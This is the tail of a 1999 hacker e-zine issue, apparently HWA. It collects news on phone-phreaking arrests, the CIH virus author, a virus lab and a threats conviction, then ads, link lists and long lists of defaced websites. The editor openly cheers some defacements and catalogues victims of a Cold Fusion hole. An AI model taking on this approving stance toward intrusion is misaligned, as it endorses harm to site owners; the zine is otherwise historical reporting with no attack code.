They gathered from across the country with cyber burglary tools in hand: a cloned cellular phone and laptop computer. The FBI identified Calvin Cantrell of Grand Prairie as a central figure in the organization. The hackers fit the FBI's profile: o white males o teens to mid-20s o self taught o obsessed "He wasn't very good at school, didn't make a lot of friends," Morris said of the individuals who fit the profile. "But when he gets on the Internet and he hacks into a system, now he basically is a cyber-God." Even though the typical hacker is not a particularly good student, they are still brilliant. "Some of these guys could be considered geniuses," Morris said. "They're very smart, and they get very bored with school." The FBI discovered that Cantrell was an unemployed 1988 graduate of Grand Prairie High School. At his parent's home, Cantrell spent up to 20 hours a day hacking into computer systems. The FBI said Cantrell took confidential credit and crime records out of computer systems and traded people's secrets for cash. "Calvin represented himself as an information broker," said private investigator Trace Carpenter, who purchased personal information from Cantrell. He said Cantrell bragged about even getting phone records close to the President. "He was obtaining long distance records for Bill Clinton's mother," Carpenter said. "I suppose this was in an effort to find a back line into the Oval Office, so to speak." HACKERS TARGET WHITE HOUSE Indeed, the Phone Masters hacked into White House phone records and unlisted numbers, according to sources in the telecommunications industry. "It shows the vulnerability of our everyday systems that we use," said Assistant U.S. Attorney Matt Yarborough. Yarborough is now prosecuting the Phone Masters for stealing millions of dollars worth of long distance calling card numbers. "Knowing and holding the keys to that system, any foreign agent or domestic hacker could choose to hack it," Yarborough said. "That could have a wide-ranging impact on our financial institutions, power and electrical, the systems we use and interact with every day." The FBI said the Phone Masters discussed crashing vital computer systems. It's unclear what the hackers may have done before the FBI got on their trail. The hackers declined to talk to News 8. @HWA 50.0 Police question CIH virus creator ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Police Question CIH Suspect contributed by mdef Taiwanese police are questioning Chen Ing-hau, 24,the self admitted creator of the CIH or Chernobyl virus that struck earlier this week. Authorities have not yet arrested Chen Ing-hau, but are trying to clarify what, if any, legal responsibility he could face if convicted. BBC http://news.bbc.co.uk/hi/english/world/newsid_332000/332147.stm Friday, April 30, 1999 Published at 10:26 GMT 11:26 UK World Chernobyl virus suspect questioned Chen Ing-hau could face a three-year jail sentence (see url for picture) Police in Taiwan are questioning a computer expert who they say has admitted creating the Chernobyl virus, which caused major disruption earlier this week. Police say Chen Ing-hau, 24, has not been charged and their investigation is in its early stages. He is said to have offered his help in efforts to counteract the virus. Hundreds of thousands of computers in Asia and the Middle East had their data wiped by the malicious programme on 26 April - the anniversary of the Ukrainian nuclear disaster in 1986. Police say Mr Chen - who recently graduated from Taipei's Tatung Institute of Technology but is currently doing his military service - has said he did not intend to cause such massive damage. Authorities say they are trying to clarify what, if any,legal responsibility he could face if convicted. In Taiwan, intentionally spreading a computer virus is an offence that carries a possible three-year prison term. Boasting to colleagues Although popularly dubbed Chernobyl, the virus is known to experts as CIH. According to Taiwanese media reports, Mr Chen's colleagues say he had acknowledged using his own initials in naming the virus. Former classmates and instructors said he had boasted of creating the Chernobyl virus and warned friends not to download it into their computers. Some reports said Mr Chen had been reprimanded quietly by his institute a year ago but not further disciplined, prompting an Internet debate about Taiwan's vigilance against cybercrime. Deadly effects The United States and Europe largely escaped the virus's effects this week, as companies had protected their computers with anti-virus programs that killed it. But in Asia and the Middle East the same precautions had in many cases been ignored. Chernobyl also spreads through pirated software, which is rife in these parts of the world. Chernobyl is less widespread than the e-mail replicator virus Melissa, but it has been warned to be far more serious, especially on Windows 95 or 98 machines. The virus can delete most of the data stored on computers and can even wipe out the BIOS - the basic instructions that tell the computer to start. @HWA 51.0 [ISN] The Virus Vault ~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles (April 28, 1999 12:46 a.m. EDT http://www.nandotimes.com) - Even the most stout-hearted hard drive would shudder. Copies of more than 43,000 computer viruses are kept under lock and key at the Malicious Code Laboratory in rural Pennsylvania, a facility operated by a company that has become the equivalent of the World Health Organization for the data processing industry. "That lab in Carlisle, Pa., has good physical security. You cannot get in without a key card," assures Roger Thompson, the affable, Australian-born technical director for malicious code research for the firm. His company - ICSA Inc., which has its headquarters in a Washington, D.C., suburb - uses the pernicious software to test and certify dozens of commercial security programs that corporations and individuals hope will protect them from malicious hackers. Thompson said the list of known viruses grows by about 1,000 a month, but many of these are simple modifications of older viruses. "Of all of the thousands of viruses we've identified, only about 150 actually get onto very many people's computer desktops. And maybe another 500 or so make it to localized outbreaks," Thompson said. The reason, despite tremendous media hype, is that computer viruses generally have a hard time proliferating. Writers of virus programs have a hard time designing a bug that will attack most personal computers because of the incredible diversity of software that computers use. "There are a few viruses that we call Win32-infectors, because they attack the Windows operating system itself. But these are very hard to write, so we don't see many of them," Thompson said. Instead, virus authors rely upon "macro" programs that attach to specific kinds of software. "We've identified about 4,000 macro viruses that attach themselves to Microsoft Office products. The reason these guys do this is they want their viruses to spread, so they pick popular software," Thompson said. Police arrested David L. Smith, 30, of Aberdeen Township, N.J., last month and charged him with authorship of the "Melissa" virus, which disrupted e-mail systems for several large companies, including Charles Schwab & Co. "Melissa wasn't overly bright. It only targeted Microsoft Mail, which isn't all that popular. But the guy found a good way to get his virus to spread," Thompson said. The program gummed up e-mail systems by sending out thousands of versions of itself, as well as pornographic Web site passwords and addresses. Despite its simplicity and the severe limitations on the kinds of software it attacks, Melissa received enough news coverage to accelerate security concerns for businesses that increasingly rely upon the Internet. "We are now a wired world," said Laurie W. Wagner, senior vice president for marketing at ICSA. "So security has become an issue for everyone, from simple consumer marketing to business-to-business transfer of critical information." Wagner said anti-virus programs and other software designed to protect computer equipment are expected to grow from a $5 billion industry in 1997 to $25 billion by 2003. That's a lot of money in order to stop a handful of bored and mostly youthful mischief-makers. "A lot of them truly are kids," Thompson said. "I've met one guy who used to be known as 'Storm-Bringer' who has come across from the dark side. He was an intelligent young man who just decided to grow up. It was clear that this (virus writing) was something he did just because he knew how." Measures to defeat "hackers" - computer enthusiasts who delight in gaining access to private, often sensitive, computer files using telephone lines or the Internet - are also becoming big business. Internet security services alone are projected to grow from a $4.6 billion market in 1996 to $11.6 billion within three years. ICSA computers at its Reston, Va., headquarters endlessly look for ways that hackers could break into corporate data systems. Once identified, these "back doors" are either closed or given "firewall" software protection to prevent unwanted outside access across the Internet. "Frequently, we find a lot of undocumented Web addresses that companies didn't know about," Wagner said. Hackers can gain access to an entire computer system through an unprotected site on the Web. "We conducted a scan for one company that had more than 1,000 undocumented sites," she said. "They were pretty surprised." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 52.0 [ISN] The Bad Guys are Crackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Bad Guys Are Crackers In Defense of Hackers Will there be more and more hackers over the next couple of years? Brent Gomes I sincerely hope so! Now, before you label me as some crazed anarchist, let me explain. Most of us geeks who are in the technology business believe ourselves to be hackers, and if someone ever calls me one I consider it a compliment. It's time to dispel some rumors about hackers and clear the air about one of the most misused terms of the computer generation. The ancient definition of a hacker is someone who makes furniture with an axe. These days a hacker can be described as a very capable programmer, or a person who enjoys exploring the details of programmable systems. Someone might think you are a hacker if you spend hours and hours figuring out how your computer system works and developing cool applications (called "hacks") that perform some useful function. In short, the computer industry needs more and more hackers in order to advance technology and solve current problems. Media Misnomer Being a hacker does not mean you spend your time breaking into computers. We can blame the journalistic community for grabbing hold of what it perceived as a catchall term and deprecating the true meaning of the word. The correct way to describe someone who circumvents computer security is a system "cracker." These malcontents are well known for breaking into the Pentagon, several defense contractors, various ISPs, and other supposedly secure systems. They have shared classified documents on the Net, given copy-protected software away, stolen credit card information and, in the process, made the online community nervous. Most of the system crackers I know are either in jail, have been in jail or are going to jail. When Hackers Grow Up The hacker population will probably rise at the same rate as every other profession, so a per-capita increase seems unlikely. The media might have us believe otherwise, since even the least-newsworthy computer "hackers" get tons of television exposure. If you want to join the elite group of technophiles, there is no time like to present to start working on your craft. "Didn't you used to be a hacker before you were a geek?"; the wife asks. "And what's the difference anyway?" I'm not paying attention. Instead I'm looking at how I can replicate the inode dataset on a ufs partition to an NTFS volume. "Never mind," she sighs, "I just figured that one out on my own." Jack Valko is the senior network manager for Buena Vista Internet Group, which produces ABCNEWS.com. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 53.0 [ISN] Email threats could bring 10yr jail term ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: darek milewski http://www.news.com/News/Item/0,4,35560,00.html Email threats earn conviction By Dan Goodin Staff Writer, CNET News.com April 22, 1999, 6:45 p.m. PT A Canadian man is facing up to 10 years in federal prison after being found guilty of sending threatening emails to Microsoft chief executive Bill Gates and a number of government officials, the U.S. attorney in Seattle said. Carl Edward Johnson, 49, of Bienfait, Saskatchewan, was convicted on four felony counts in connection with the threats, some of which were posted to a popular encryption mailing list using software that hides the identity of the sender. His conviction wraps up a two-year investigation by officials from the Treasury Department. Johnson, who is scheduled for sentencing on June 11, is being held in a federal detention center near Seattle. His attorney was not immediately available for comment. U.S. District Judge Robert Bryan found Johnson guilty of using the Cypherpunks mailing list to threaten government officials, said assistant U.S. attorney Floyd Short. The court found that Johnson in June of 1997 used an anonymous remailer to post a message offering a reward if someone would kill a magistrate judge and several Treasury Department investigators. The officials were involved in the criminal prosecution of a man accused of illegally compiling names and addresses of employees at the Internal Revenue Service and trying them in so-called common law courts. The court also found that Johnson posted messages threatening the lives of three federal appeals court judges who are hearing a case challenging government restrictions of the export of encryption software. Johnson said the judges would end up in "a pine box or a body bag" if they ruled against Chicago professor Daniel Bernstein, a plaintiff in the civil case against the regulations, Short said. Johnson also was convicted of sending email to Gates claiming the top Microsoft executive's assassination was being planned. Floyd said that investigators were able to learn Johnson's identity by piecing together information he left on Web sites, in email messages, and in his home. Interestingly, a key piece of evidence included what is known as the public key in a program called Pretty Good Privacy, which is designed to conceal a computer user's identity. Johnson's conviction comes a week after federal investigators were able to track down the man they allege anonymously posted a hoax news story that caused the stock of a California company to rise more than 30 percent. "People may feel they are anonymous on the Internet, and that's not the case," Short said. "The level of understanding of the Internet is rising quite a bit within law enforcement." @HWA 54.0 [ISN] Singapore ISP scans customer computers for vulnerabilities http://straitstimes.asia1.com/one1/one1.html SINGAPORE (April 29, 1999 11:53 p.m. EDT http://www.nandotimes.com) - Singapore's national telecommunications company has scanned more than 200,000 computers of its Internet customers without their knowledge as part of a plan to ward off hackers, the Straits Times reported on Friday. Singapore Telecom, which is 80 percent owned by the government, began the scan last month of nearly half of Singapore's Internet users to check whether its customers were vulnerable to hacker attacks, the report said. The scanning would continue until all accounts of its SingNet and SingTel Magix customers were covered, it said. "We are merely protecting the interest of our customers," the report quoted Singapore Telecom chief executive officer for multimedia Paul Chong as saying. SingNet had asked the Home Affairs Ministry's IT security unit to do the scan following news in March of the arrest of two boys who had hacked into 17 SingNet customers' accounts. Officials at Singapore Telecom were not immediately available for comment. The disclosure from Chong came after the Straits Times reported on Thursday that 21-year-old law student Anne Lee had complained to the police that someone with an account in the Home Affairs Ministry had hacked into her account. Chong said SingTel was being "responsible" by giving customers the "value-added service" of scanning their computers. On whether the law allowed such scanning without customers' consent, Chong said nothing illegal had taken place. He said customers were not informed of the scan so as not to alarm them. "We do not want to make a mountain out of a molehill. In the end, the scan might not turn up anything. If we had informed the customers, it might cause an alarm," Chong said. He added that "real hackers might lie low" if they knew of the scan. Chong was quoted as saying the scanning so far showed that some users were vulnerable and that they would be informed when the process was over. The Home Ministry was approached because it was the "expert" in the area -- it helped crack the case of the two teenage hackers. Chong stressed that the scan did not delve into users' computer databases, or amount to an illegal entry into computer accounts, the Straits Times reported. "There is no invasion of privacy at all. Basically, what we did was check if the systems had open windows through which hackers can exploit," Chong said. Chang Wai Leong, a SingTel director, was quoted in the report as describing the scan as like a "policeman patrolling in cyberspace checking if the "windows" of the computer system are opened." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * *****************************************************************************
Come.to/Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j http:/ 99 http:o http:/ login: sysadmin n99 httpi /come. password: tp://comn to/Can me.to/Cat c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h http:/ industry people to attend with booths and talks. 99 http:e /come. you could have a booth and presentation for the cost of p://comel http:/ little more than a doorprize (tba) contact us at our main n99http:i http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s http:/ for updates. This is the first Canadian event of its type invalid t 403 Fo and will have both white and black hat attendees, come out logged! ! 404 Fi and shake hands with the other side... *g* mainly have some IP locked ome.to fun and maybe do some networking (both kinds). see ya there! hostname http:/ x99http:x o/Canc x.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 Canc0n99 Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* @HWA HOW.TO How to hack part 3 ~~~~~~~~~~~~~~~~~~ To be continued (probably) in a future issue... if time permits and inclination is prevelant. ie: if & when I feel like it.. :p (discontinued until further notice) Meanwhile read this: http://www.nmrc.org/faqs/hackfaq/hackfaq.html Link And especially, this: http://www.tuxedo.org/~esr/faqs/hacker-howto.html Link (published in its entirety in issue #12) @HWA SITE.1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... April 25th From http://www.403-security.org/ 3 sites got hacked by Moscow Security Team Astral 25.04.1999 12:25 Today Moscow Security Team hacked 3 sites : lica.co.uk, fdfoto.com, tri-starmall.com. All sites had same hacked index.htm and text on hacked sites were same :" I want to say: admin's of this site is very lame!!!! This can't protect their site!Privet to all haX0rs grups from Russia, Moscow!:)) ". Archive of hack. April 26th From HNN rumours section; contributed by Anonymous Cracked Cold Fusion is working its magic. Many of these sites where recently reported cracked because of the hole in Cold Fusion. Many have been done by group known as Forpaxe. We are listing almost all of the reported sites today just to show how widespread this problem is. http://thresher1.gsfc.nasa.gov http://www.bestmidwestmall.com http://advances.com http://www.bellanet.com http://www.state.wv.us http://www.ewic.org.uk http://www.store.net http://www.bankerusa.com http://www.cleanteam.com http://www.actcomm.com http://www.pictureshow.com http://www.mallworld.com/ http://www.huang.com/ http://www.digital2000.com/ http://www.autoshow.com/ http://www.usautoparts.com/ http://www.nationwidetrading.com/ http://www.jaamejam.com/ http://www.spiffest.com http://www.pacificshorehotel.com/ http://www.thebeachsuites.com http://www.tvbusa.com/ http://www.hotelcarmel.com http://www.snakclub.com/ http://www.georgianhotel.com/ http://www.wwwonders.com/ http://ns1.wing.net http://www.schoollink.net http://geonorth.com http://nmc.itc.virginia.edu/ http://orbit.unh.edu http://www.ewic.org.uk http://www.utrecht.nl http://cddocs.fnal.gov http://www.ultralert.com http://www.sellnet.com.au http://download.throbnet.com http://www.athi.com.au http://www.budgettravel.to http://www.cargohold.com.au http://www.councilexghanges.org.au http://www.ellamaiden.com http://www.howtoget.to http://www.ibaustralia.com http://www.interlink.asn.au http://www.juster.com.au http://www.motorart.com http://www.offyourhead.com.au http://www.siberiankitty.com http://www.bicafe.com http://www.nymfoseek.com http://www.tucsonfiestabowl.com http://www.game-online.com http://www.giftedpeople.com/ http://www.braingate.com http://www.state.co.us http://mot.vuse.vanderbilt.edu http://www.muchmusic.com http://www.edunet.com http://www.exn.ca April 27th contributed by Anonymous Cracked Cold Fusion sites are still being hit. Most of todays sites are a result of the recently released Cold Fusion problem. If you haven't patched your system yet you better do so soon. http://teamweb3.lbl.gov http://herbb.hanscom.af.mil/index.htm http://www.adultseek.net http://www.vrgirls.com http://www.vrsluts.com http://www.towngreen.com http://www.exn.ca http://www.eaglebaytrading.com/ http://tri-starmall.com/ http://lica.co.uk/ http://fdfoto.com/ http://owk.nvart.ru/ http://www.cide.mx http://www.state.id.us http://www.diamondmm.com http://www.state.sd.us http://www.mwm.net http://www.mwm.net/ http://www.adultkey.com/ http://www.1wrestling.com http://www.3m.com http://www.tay.ac.uk April 28th http://thayerstreet.org http://jopa.hypermart.net/ http://www.ci.la.ca.us http://www.parctechno.qc.ca/ http://ois.nist.gov/index.html http://www.parctechno.qc.ca April 29th Via HNN rumours section http://www.hackernews.com/ contributed by Anonymous Cracked Admins have still not patched their Cold Fusuion sites. Many of these reported cracks are a result of that hole. http://www.ezcd.com http://www.itar-tass.com http://xre22.brooks.af.mil http://www.powermanager.com http://www.leg.state.fl.us http://www.wcresa.k12.mi.us http://www.users.sccoast.net http://www.adult.ru http://ois.nist.gov http://www.airbed.com http://www.houseit.com http://www.hrsa.dhhs.gov http://www.parctechno.qc.ca http://www.roc.ru http://www.thayerstreet.org http://fa.havengames.net http://los.extremeblizzard.com http://wn.havengames.net http://miraesoft.ugn3d.com http://haven.extremeblizzard.com http://www.computer-solutions.net http://tgrc.ucdavis.edu/ April 30th From HNN rumours section contributed by Anonymous Cracked The following sites have been reported as cracked. http://kenlince.dynip.com http://this.gsfc.nasa.gov http://www.academic.marist.edu http://www.dos.gov.jo http://www.secure-service.org http://www.totalimageprinting.com http://www.faa.gov - "Kosovo - stop the war" archived at http://www.403-security.org/Archive/Sploit/www.faa.gov.htm http://www.recreation.gov http://ns1.rrsan.com http://hunain.fkm.utm.my http://los.extremeblizzard.com http://www.computer-solutions.net http://newsnet.byu.edu http://mama.uchsc.edu http://www.cabp.com http://www.brain3.com ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file Mirror sites: ~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.genocide2600.com/~tattooman/zines/hwahaxornews/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]